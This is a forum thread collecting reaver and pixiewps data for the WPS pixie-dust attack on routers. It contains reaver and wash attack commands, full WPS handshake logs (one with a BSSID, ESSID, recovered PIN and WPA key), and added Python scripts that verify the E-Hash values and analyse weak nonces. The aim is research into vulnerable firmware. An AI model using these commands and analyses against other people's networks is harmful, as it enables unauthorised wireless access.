
Thread: Data gathering for pixiewps (pixie dust attack)

  1. #1
    Join Date
    2015-Mar
    Posts
    54

    Data gathering for pixiewps (pixie dust attack)

    Hi everyone,
    we have decided to start collecting data again for the WPS pixie dust attack (pixiewps), however we will be thorough this time:
    1. The data must be collected with Reaver 1.6.3 and with the new -vvv debug option (now included in kali)
    2. A set of data must contain a full transaction from M1 to M7 (thus you MUST know the PIN)
    3. 2 consecutive transactions (2 sets of data close in time) would be ideal (run reaver once, grab the data, then run reaver again, grab the new data)
    4. The data should be filtered with logfilter.py
    5. Please include the model / name of the router (possibly using wash --json for the specific router, you can edit out the BSSID and ESSID for privacy reasons)
    6. DO NOT use -S (--dh-small)
    7. Which data do we want? See below:

    • Realtek that pixiewps can't pwn (some RTL8671 ?)
    • Data where nonces (E-nonce) follow a weird pattern like xx:xx:00:00..., 00:00:xx:xx... etc. (eg. 00:00:42:b4:00:00:6a:2e:00:00:07:80:00:00:43:45)

    The latest pixiewps uses multi-threading so you may want to use that instead of the one included in kali. Some changes are still in the works so I won't push a new tag for now.

    To collect data you can use something like this (be sure to use the correct pin):
    Code:
    sudo -i
    reaver -vvv -i MONITOR -b BSSID -p PIN 2>&1 | tee reaver.log
    cat reaver.log | python2 logfilter.py 1>&2 2>PIXIEDATA.TXT
    wash -i MONITOR -j --scan -n 25 | grep -i BSSID | tee ROUTERDATA.JSON
    You can also copy and paste the full logs if you have problems following this procedure.

    Remember that in most cases WPS 2.0 locks after 10 FAILED attempts. After that a reboot is required to reset.

    Why collecting data again after all this time?
    Pixiewps has improved over time; it is now more mature, and so is Reaver. But there are still potentially vulnerable devices out there and margins for improvement overall.

    Please keep the thread related to gathering data only. Post questions only if important. That is also the reason why I'm starting a new thread: the others are too clogged up. Hope the mods don't mind.
    Last edited by wiire; 2017-12-24 at 18:13. Reason: fixed example commands
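
Requirement 2 above says a set must be a full M1 to M7 transaction with a known PIN. The script below is an added example for checking that before you post a set; it is not code from wiire's post, from reaver or from pixiewps. It parses the "[*] Field: hex" lines in the format shown in this thread (and, as an assumption about reaver's -vvv output, the same fields printed as colon-separated hex), checks the PIN checksum digit, and recomputes E-Hash1/E-Hash2 from AuthKey, PKE, PKR, E-S1, E-S2 and the PIN the way the WPS specification defines them. The embedded sample is the first ASUS DSL-N10E transaction posted later in this thread (PIN 13850319), trimmed to the lines the parser needs.

```python
"""Consistency check for a pixie-dust data set against the known PIN.

Added example for this thread; not code from the original post nor from
reaver or pixiewps. Recomputes, as defined in the WPS specification:

    PSK1    = HMAC-SHA256(AuthKey, PIN[0:4])[:16]
    PSK2    = HMAC-SHA256(AuthKey, PIN[4:8])[:16]
    E-Hash1 = HMAC-SHA256(AuthKey, E-S1 || PSK1 || PKE || PKR)
    E-Hash2 = HMAC-SHA256(AuthKey, E-S2 || PSK2 || PKE || PKR)

A set whose two hashes both verify is a complete M1..M7 transaction whose
logged PIN is right, which is what requirement 2 asks for.
"""
import hashlib
import hmac
import re

FIELDS = ("E-Nonce", "PKE", "PKR", "AuthKey", "E-Hash1", "E-Hash2", "E-S1", "E-S2")
# "[*]" is the Router Scan style shown in the thread; "[P]" and colon-separated
# hex are an assumption about what reaver -vvv prints.
LINE_RE = re.compile(r"\[[*P]\]\s+(%s):\s*([0-9A-Fa-f:]+)" % "|".join(FIELDS))

# Sample log, copied from the ASUS DSL-N10E post in this thread (run 1).
SAMPLE_LOG = """\
[*] Received WPS Message M1.
[*] E-Nonce: 0000497B000030CF00003B58000042CB
[*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B
[*] Manufacturer: Realtek Semiconductor Corp.
[*] Sending WPS Message M2...
[*] PKR: 3B617AD18518A5D021C6B8EB2BC8DF881CF9DF7FB00C1C4E485C8F068B4871BA5ADDD26C4F6FBFB479EF8298CFE2D39387E018656009DBD3D17F00FFA6F49D6577D48D2A84F0BF12AC111E122FD3C9F8996DB7856C38C54AD203AFF0F3E4D8D3E442DA0A67A19FE5DDB097BA7672B3504B1AC3466CDAEE183039BC8C99C5AD86787355821707B6223C6005CB1F690E0590381B93E08B1C163050AEA0A104EA22DE422B9CD76AF37D8C8C3B596A43FD0B6FB617376C2792951E8C7B231B7B8583
[*] AuthKey: 1FB4802250487E98E4B0F9D5AD0C859348AC6CC583ECBCEB6B6B5D9D880864C1
[*] Received WPS Message M3.
[*] E-Hash1: 4C6143B908F5226DEE0C40078478FDFD3495571DCFEDB2A912424D79E361E3C1
[*] E-Hash2: F6D95087CDE720EBD0DAEDD7511DE6A6A8FC6697F88579AFEF12A3F399D6D64A
[*] Received WPS Message M5.
[*] E-S1: 00001003000015AE000015B700005776
[*] Received WPS Message M7.
[*] E-S2: 0000139000001AF4000016B300003383
"""


def parse_sets(log_text):
    """Split a log into transactions. Every E-Nonce line (M1) starts a new
    set, so a log holding several runs yields one dict per run."""
    sets, cur = [], {}
    for m in LINE_RE.finditer(log_text):
        key, val = m.group(1), m.group(2).replace(":", "")
        if key == "E-Nonce" and cur:
            sets.append(cur)
            cur = {}
        cur[key] = bytes.fromhex(val)
    if cur:
        sets.append(cur)
    return sets


def pin_checksum_ok(pin):
    """The last digit of an 8-digit WPS PIN is a checksum over the first seven."""
    d = [int(c) for c in pin]
    if len(d) != 8:
        return False
    acc = 3 * (d[0] + d[2] + d[4] + d[6]) + (d[1] + d[3] + d[5])
    return (10 - acc % 10) % 10 == d[7]


def e_hashes(authkey, pin, pke, pkr, es1, es2):
    """Recompute E-Hash1 and E-Hash2 for a PIN from the logged values."""
    psk1 = hmac.new(authkey, pin[:4].encode(), hashlib.sha256).digest()[:16]
    psk2 = hmac.new(authkey, pin[4:].encode(), hashlib.sha256).digest()[:16]
    h1 = hmac.new(authkey, es1 + psk1 + pke + pkr, hashlib.sha256).digest()
    h2 = hmac.new(authkey, es2 + psk2 + pke + pkr, hashlib.sha256).digest()
    return h1, h2


def verify_set(s, pin):
    """Return (hash1_ok, hash2_ok); raise if the set is not a full M1..M7 run."""
    missing = [f for f in FIELDS if f not in s]
    if missing:
        raise ValueError("incomplete set, missing: " + ", ".join(missing))
    h1, h2 = e_hashes(s["AuthKey"], pin, s["PKE"], s["PKR"], s["E-S1"], s["E-S2"])
    return h1 == s["E-Hash1"], h2 == s["E-Hash2"]


if __name__ == "__main__":
    pin = "13850319"
    print("PIN checksum ok:", pin_checksum_ok(pin))
    for n, s in enumerate(parse_sets(SAMPLE_LOG), 1):
        ok1, ok2 = verify_set(s, pin)
        print("set %d: E-Nonce=%s E-Hash1 %s, E-Hash2 %s" % (
            n, s["E-Nonce"].hex(), "ok" if ok1 else "MISMATCH", "ok" if ok2 else "MISMATCH"))
```

To check your own capture, read reaver.log into a string and pass it to parse_sets(); a set that raises "incomplete set" did not reach M7, and a set where E-Hash1 is ok but E-Hash2 is not usually means the second half of the PIN you typed is wrong.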

  2. #2
    Join Date
    2017-Nov
    Location
    Russia, Moscow
    Posts
    1
    Quote Originally Posted by wiire View Post
    The data must be collected with Reaver 1.6.3 and with the new -vvv debug option (now included in kali)
    Is it ok to post the data from latest Router Scan nightly build? Here's one for example:

    Huawei HG8245H (device #1)

    Code:
    [*] Audit started at 2017.11.22 22:06:30 (UTC+03:00).
    [*] E-Nonce: 68BE01DF8A8DB9794F3126C582F9A274
    [*] PKE: E8CCCEBB58C29F9F4850E63E2E9206623765CCC8BBC0382C531E62FD8B90BF2FC7A132F398D7E8E037160BBFAB1E30E95856FF813E88282CD2CA42CE905A9CF7FBEB9D206EF6BFDB95590030D7A3D41FC9F362F2AFF3ED9FC14534E2872C8319EFEA5524DEE674EDC43843628C9F8F02CE675DB76B4B5A679C1375420E0304136E1E7C917602598E696DEDEE76B17601C8F01E50EE8CFDC023A774670EF00B96E3DABB2E963BA81A8FFEDD699A71D41581400691D39772CF1B150D6B907279CF
    [*] Manufacturer: Huawei
    [*] Model Name: Huawei
    [*] Model Number: HG8245H
    [*] Serial Number: 39
    [*] Device Name: HuaweiONT
    [*] PKR: E40D6B624FB03754E7231B8CBECA1C049DEB272173227B768E3D2C860E9E0C8EC1FFA4D7DBD1F8B2486EDFDB510AA19EE2D6598210D135DC226BC4181AB7197993B39A7270CD7A7DD60FCA03EDE3697C1F8B21962878157169EF17D099D769CF24874A2E077696DEAAF152C485E09F733445191D6D44A22187F241F2B3A9737E96AEFAF27378775A623844AD16AA48A69B4C07772C929843D9EACF77E9FCEE514BAC7602C16A0CB8048BD52FAAB6466055EF38B630E937717060AEAD79EC59EF
    [*] AuthKey: A1778780E59EC72194AF1BC977FAE6ED1214126151D1509AA49CF0298E19CD4E
    [*] E-Hash1: 02D302C8AA7E2D3AB161C48AF29E439F438C4903E298B3FFE6F5B0845C97A58E
    [*] E-Hash2: C77B53318827FC12DF2ECFDB445BC702E848D3BBD0156D6B878221465A82B42E
    [*] E-S1: DE030256AF7F4A8D5E52FBEA277C471D
    [*] E-S2: EF25F4668C2FE0FB55BCA8973094690E
    [*] Audit stopped at 2017.11.22 22:06:39 (UTC+03:00).
    
    [*] Audit started at 2017.11.22 22:06:40 (UTC+03:00).
    [*] E-Nonce: C240EB3DAC82A15C913C893D9FACEF42
    [*] PKE: A5EA92289132F132D8ADADA9D8169C89F0645B1757E7D1FCA3FDA81D41E4501FA99641D8D4865DA72709FCC66762769826793F7FCE685ECBABBFEC880951A4A2E4C2BA45E7DE20D3FFD0BC44868DE2E1AE8C267B50DB41F6543EA358277FCA1FD98CF682CAAFE522D751DD71DD4B88B90C5BCB03195F78C6EB05376E0A437A6B657472D99E4A671A0158FCAF6CD242762B8E36E1C4A41085D8ED8DDE44588325E1AE32AB77C0953DA047F30D431C2C06DECEC4AD341FEF9C350D37935FF89690
    [*] PKR: B2A1FC3590D9C2AD249E0368C0919AD142E16144727F8E6A2BD7BF1F7A85488FBC2876189617EAA78C24E02697C81FD5D18120B31A82B84B349EA1E11E592224B8151095647C4A1EF79D47F7D1451D78380B7F0F90BFCD60D9C2E453FD54BE93152A06D030E54A72F0384E110352D68014EA8977DB61A0FCFFB38A665B3D1ACC0FED9A0EDD1A2FA0A9A438BB16AA2E5B425E9203BDDF4A71D0897551AC1879013E26985D6BB4ABF8EECCC86B22A2BFE9E8CC6BCEC215B7D2D6C57BF396BAF321
    [*] AuthKey: 8850EABC8F169ABF32C8A35AB560355665E7612729BBBBB629AA741C8AB89088
    [*] E-Hash1: 8C1CA9A83EFE84CD7E0564B11904B2B3374E2B4D386B18DB4E8AB0EE54DD3BC9
    [*] E-Hash2: 15BFE6BB5FE0198FC3B8466F038CB64291B1825CBB87784DB82296AB686782B5
    [*] E-S1: 0715E717B90532588D2448049FE0D744
    [*] E-S2: 5A3C4CEBB2EE1D30B6E822EE6CCA7450
    [*] Audit stopped at 2017.11.22 22:06:49 (UTC+03:00).
    Last edited by binarymaster; 2017-11-22 at 21:11.
    by Stas'M

  3. #3
    Join Date
    2015-Mar
    Posts
    54
    Yes, thank you. Enrollee nonce, the 2 secret nonces and details like brand, model etc. are the most important data

    Sorry I haven't replied sooner, I had problems logging in on the forum.

    @everyone
    If you have trouble following the instructions, just copy and paste the full logs by hand. Maybe use a pastebin or similar if you don't want to clog everything up.

  4. #4
    Join Date
    2016-Jan
    Posts
    6
    ASUS ADSL home gateway, model DSL-N10E, firmware ver. 2.1.19_EU
    Quote Originally Posted by wiire View Post
    Realtek that pixiewps can't pwn (some RTL8671 ?)
    Data where nonces (E-nonce) follow a weird pattern like xx:xx:00:00..., 00:00:xx:xx... etc. (eg. 00:00:42:b4:00:00:6a:2e:00:00:07:80:00:00:43:45)
    2 datasets below
    Code:
    [*] Audit started at 2017.12.05 19:51:00 (UTC+02:00).
    [*] Associating with AP...
    
    [+] Associated with 74:D0:2B:84:41:D7 (ESSID: Natalya).
    [*] Trying pin "13850319"...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received WPS Message M1.
    [*] E-Nonce: 0000497B000030CF00003B58000042CB
    [*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B
    [*] Manufacturer: Realtek Semiconductor Corp.
    [*] Model Name: ADSL Router
    [*] Model Number: EV-2006-07-27
    [*] Serial Number: 123456789012347
    [*] Device Name: ADSL Router/Modem IGD
    [*] Sending WPS Message M2...
    [*] PKR: 3B617AD18518A5D021C6B8EB2BC8DF881CF9DF7FB00C1C4E485C8F068B4871BA5ADDD26C4F6FBFB479EF8298CFE2D39387E018656009DBD3D17F00FFA6F49D6577D48D2A84F0BF12AC111E122FD3C9F8996DB7856C38C54AD203AFF0F3E4D8D3E442DA0A67A19FE5DDB097BA7672B3504B1AC3466CDAEE183039BC8C99C5AD86787355821707B6223C6005CB1F690E0590381B93E08B1C163050AEA0A104EA22DE422B9CD76AF37D8C8C3B596A43FD0B6FB617376C2792951E8C7B231B7B8583
    [*] AuthKey: 1FB4802250487E98E4B0F9D5AD0C859348AC6CC583ECBCEB6B6B5D9D880864C1
    [*] Received WPS Message M3.
    [*] E-Hash1: 4C6143B908F5226DEE0C40078478FDFD3495571DCFEDB2A912424D79E361E3C1
    [*] E-Hash2: F6D95087CDE720EBD0DAEDD7511DE6A6A8FC6697F88579AFEF12A3F399D6D64A
    [*] Sending WPS Message M4...
    [*] Received WPS Message M5.
    [*] E-S1: 00001003000015AE000015B700005776
    
    [+] First half found: 1385
    [*] Sending WPS Message M6...
    [*] Received WPS Message M7.
    [*] E-S2: 0000139000001AF4000016B300003383
    [*] Sending WSC NACK...
    [*] EAP session closed.
    
    [+] WPS PIN: 13850319
    
    [+] SSID: Natalya
    
    [+] Key: 1234567890
    
    [+] Key Index: 1
    [*] Audit stopped at 2017.12.05 19:51:09 (UTC+02:00).
    [*] Audit started at 2017.12.05 19:51:10 (UTC+02:00).
    [*] Associating with AP...
    
    [+] Associated with 74:D0:2B:84:41:D7 (ESSID: Natalya).
    [*] Trying pin "13850319"...
    [*] Sending EAPOL Start...
    
    [-] Request timed out.
    [*] Trying pin "13850319"...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received WPS Message M1.
    [*] E-Nonce: 000079F70000103D000030B600007DEC
    [*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B
    [*] Manufacturer: Realtek Semiconductor Corp.
    [*] Model Name: ADSL Router
    [*] Model Number: EV-2006-07-27
    [*] Serial Number: 123456789012347
    [*] Device Name: ADSL Router/Modem IGD
    [*] Sending WPS Message M2...
    [*] PKR: 6C61743CBE029AD0455553B23F05F154A076140505CB9C29F3D3685652F4A10EAB2C7C8E8C5DD039033A08CF3CA078940C8A8A00CE7D171E364F611E897DD9486C287755E30357275D6CEB7E97101C2D71398C3E2960384B169883C9FC7068E64E680FD73558A317C197CAB19CD669F0BD65CDB57F419B91F56E6473D6A112E2D79685258D2E6AC3DD5659D45FA759BDD420BF5FA9C8702E8021BF45DE2E42488BE048A59024D9B471DC05B03B0CE7AF8945CF95848857CEF2F6C663C55218F4
    [*] AuthKey: 0EF51A6ED5BEE1647480B874EFD0400010F7D287429132E3FD912ED1B5002BE9
    [*] Received WPS Message M3.
    [*] E-Hash1: 1B761BB7DE29C0CF8839B6F0858583814F001E95EFBF918F27C640A532207941
    [*] E-Hash2: B74C37199A8FB5A22DA2EC48DE2D2919F17D658E10FFD6CFFBB92E9775480771
    [*] Sending WPS Message M4...
    [*] Received WPS Message M5.
    [*] E-S1: 00007EB90000327A00000A9800002491
    
    [+] First half found: 1385
    [*] Sending WPS Message M6...
    [*] Received WPS Message M7.
    [*] E-S2: 00000246000037BF00000B940000009E
    [*] Sending WSC NACK...
    [*] EAP session closed.
    
    [+] WPS PIN: 13850319
    [+] SSID: Natalya
    [+] Key: 1234567890
    [+] Key Index: 1
    [*] Audit stopped at 2017.12.05 19:51:25 (UTC+02:00).
    [*] Audit started at 2017.12.05 19:51:30 (UTC+02:00).
    [*] Associating with AP...
    
    [+] Associated with 74:D0:2B:84:41:D7 (ESSID: Natalya).
    [*] Trying pin "13850319"...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received WPS Message M1.
    [*] E-Nonce: 000071E400005D9D000073000000066A
    [*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B
    [*] Manufacturer: Realtek Semiconductor Corp.
    [*] Model Name: ADSL Router
    [*] Model Number: EV-2006-07-27
    [*] Serial Number: 123456789012347
    [*] Device Name: ADSL Router/Modem IGD
    [*] Sending WPS Message M2...
    [*] PKR: 4870430F9757C2871408F388EF668FE241502E28864A3F4D8F7E2B44D0E4BAFD284FFE81EFA5F1803C69969C49DF851BD5C65D828DBF685873C99025D565175023D142F5B73BEB807D16301853DE3B1E0427DF213B7A44820D1748576B2154620932B383142510C6D771BFAA715E1C17465456257C7010EE19E3FF7AA2DED803175D326B5BE102A0FD5B8077FD1E8359BA4AD59EB6F49F95302F4CDB3B64CE5D7FF809206B9B7125CEB288F20C18C5772699BEB04E0569229128CDD918F34B47
    [*] AuthKey: 56EB940A1260E08AD7871738D62D619EA88A163ABCC1EEEC45651B7D1991CAEE
    [*] Received WPS Message M3.
    [*] E-Hash1: DB2D80359B0D842048CB15BB3A8A55DE241B741E43459AB1938CD5A11AC5AF1F
    [*] E-Hash2: 045B9585812EE096F4325642C06739A91D9E8F5B51A5B6BC8996B91DC6A1CCFB
    [*] Sending WPS Message M4...
    [*] Received WPS Message M5.
    [*] E-S1: 00007DBF00000A6400004ED900006529
    
    [+] First half found: 1385
    [*] Sending WPS Message M6...
    [*] Received WPS Message M7.
    [*] E-S2: 0000014B00000FA900004FD500004136
    [*] Sending WSC NACK...
    [*] EAP session closed.
    
    [+] WPS PIN: 13850319
    
    [+] SSID: Natalya
    [+] Key: 1234567890
    [+] Key Index: 1
    [*] Audit stopped at 2017.12.05 19:51:39 (UTC+02:00).
    Last edited by ForumKali2016; 2017-12-05 at 17:56.

  5. #5
    Join Date
    2015-Mar
    Posts
    54
    @ForumKali2016 Thank you very much!

    The router seems to be bugged, but not broken since the protocol goes through correctly (to M7).

    Code:
    0000497b 000030cf 00003b58 000042cb
    00001003 000015ae 000015b7 00005776
    00001390 00001af4 000016b3 00003383
    
    000079f7 0000103d 000030b6 00007dec
    00007eb9 0000327a 00000a98 00002491
    00000246 000037bf 00000b94 0000009e
    
    000071e4 00005d9d 00007300 0000066a
    00007dbf 00000a64 00004ed9 00006529
    0000014b 00000fa9 00004fd5 00004136
    Here's what you could do:
    - collect 20 - 30 consecutive sets of data, trying to keep the same distance in time between the runs (i.e. with a script, I'm sure @binarymaster would help)
    - record the exact date and time of the router when you start the whole process
    - check if NTP is enabled and if the router has the correct date and time set

    That would help a lot. Thank you again!
    Last edited by wiire; 2017-12-06 at 00:49.
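
The table above lays each 16-byte value out as four 32-bit words, and the pattern is visible by eye. The script below is an added example (not code from any post here, nor from pixiewps) that does the same check mechanically over whole data sets: it classifies the zero pattern of every value ("00:00:xx:xx", "xx:xx:00:00" or none), reports how many bits the words actually use, and lists words that repeat between runs. The sample values are copied from the posts above: the three ASUS DSL-N10E runs and the first Huawei HG8245H E-Nonce. One reading of the ASUS numbers, which is mine and not something the thread states: every word is below 0x8000, i.e. fits in 15 bits, the range of a libc-style rand() with RAND_MAX 0x7fff, so a "128-bit" nonce carries at most 60 bits even before asking how the generator is seeded.

```python
"""Nonce word-pattern check for the "weird nonces" this thread collects.

Added example; not from any post in this thread and not pixiewps code.
Each 16-byte value (E-Nonce, E-S1, E-S2) is split into four 32-bit words,
the zero pattern is classified, the effective word width is measured and
repeats between consecutive runs are listed.
"""

# Copied from the ASUS DSL-N10E post (three runs) and the Huawei post above.
ASUS_RUNS = [
    {"E-Nonce": "0000497B000030CF00003B58000042CB",
     "E-S1": "00001003000015AE000015B700005776",
     "E-S2": "0000139000001AF4000016B300003383"},
    {"E-Nonce": "000079F70000103D000030B600007DEC",
     "E-S1": "00007EB90000327A00000A9800002491",
     "E-S2": "00000246000037BF00000B940000009E"},
    {"E-Nonce": "000071E400005D9D000073000000066A",
     "E-S1": "00007DBF00000A6400004ED900006529",
     "E-S2": "0000014B00000FA900004FD500004136"},
]
HUAWEI_ENONCE = "68BE01DF8A8DB9794F3126C582F9A274"


def words32(hexstr):
    """Split a hex string (plain or colon-separated) into big-endian 32-bit words."""
    h = hexstr.replace(":", "")
    return [int(h[i:i + 8], 16) for i in range(0, len(h), 8)]


def word_pattern(hexstr):
    """Classify the zero pattern shared by every word of one value."""
    ws = words32(hexstr)
    hi_zero = all(w >> 16 == 0 for w in ws)
    lo_zero = all(w & 0xFFFF == 0 for w in ws)
    if hi_zero and lo_zero:
        return "all-zero"
    if hi_zero:
        return "00:00:xx:xx"
    if lo_zero:
        return "xx:xx:00:00"
    return "none"


def effective_bits(hexstrs):
    """Largest bit length any word reaches; 32 for a healthy random nonce."""
    return max(w.bit_length() for h in hexstrs for w in words32(h))


def repeated_words(runs):
    """Words that show up in more than one run. A generator reseeded from a
    coarse clock tends to repeat outputs, which is one reason to collect
    consecutive runs with known timing (interpretation, not stated in the thread)."""
    seen = {}
    for idx, run in enumerate(runs):
        for value in run.values():
            for w in words32(value):
                seen.setdefault(w, set()).add(idx)
    return {w for w, idxs in seen.items() if len(idxs) > 1}


def summarize(runs):
    """Per-dataset summary: patterns seen, effective word width, the entropy
    upper bound that width implies (assumes four independent draws) and repeats."""
    values = [v for run in runs for v in run.values()]
    bits = effective_bits(values)
    return {
        "patterns": {word_pattern(v) for v in values},
        "effective_bits": bits,
        "entropy_bits_max": 4 * bits,
        "repeated_words": repeated_words(runs),
    }


if __name__ == "__main__":
    print("ASUS DSL-N10E:", summarize(ASUS_RUNS))
    print("Huawei E-Nonce pattern:", word_pattern(HUAWEI_ENONCE),
          "bits:", effective_bits([HUAWEI_ENONCE]))
```

For a larger collection of runs, build the list of dicts from your own logs and look at "repeated_words" together with the timestamps of each run; if the same words come back when runs start within the same second, that is the seeding clue the request above is after.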

  6. #6
    Join Date
    2016-Jan
    Posts
    6
    New datasets - untouched output from a fresh Kali distro terminal
    http://www43.zippyshare.com/v/oioRqXdZ/file.html
    Reaver started at exactly 18:44:00 GMT+2 08.12.2017 by the router clock (or maybe +-2 sec). Delay between attempts = 1 sec or less; I tried to restart reaver as fast as I could, but some misclicks are present.

  7. #7
    Join Date
    2015-Mar
    Posts
    54
    OK, thank you! Meanwhile I think @binarymaster was adding some features to RS, to make it easier for testing / gathering data.

  8. #8
    Join Date
    2016-Mar
    Posts
    5
    Are you looking for only devices that are unknown to be vulnerable or all devices?

  9. #9
    Join Date
    2016-Dec
    Posts
    95
    I have all the data copied and pasted into my terminal, but then it says .28 milliseconds to find the WPS pin. No pin found. Am I supposed to type some extra info? My router is a wifi robin, aka wifi robber. Are the strings supposed to have dashes or be in brackets? Thank you wiire!! I have included the ESSID.

  10. #10
    Join Date
    2018-Feb
    Posts
    1
    I usually run reaver -i wlan0 -b BSSID -c 1 -vv -K 1 -f -N, which I found works quickly on vulnerable routers (Ralink and Realtek).

    Today I tested it on another Ralink router and, after a while, pixiewps first told me "WPS pin not found!" and then "Looks like you have some interesting data! Please consider contributing with your data to improve pixiewps".

    So here I am.
    My environment:

    Reaver v1.6.4-git-17-g6833d00 - Pixiewps 1.4.2 both from the latest commits on Github.
    Alfa AUS036NHA - Atheros Communications, Inc. AR9271 802.11n

    I read the instructions, but I still don't know the PIN code, so I collected the log files anyway.

    I don't want to publicly share these logs; is there a way to send you a PM? I am also on Github, but there too I don't see a way to send you a PM. Let me know.
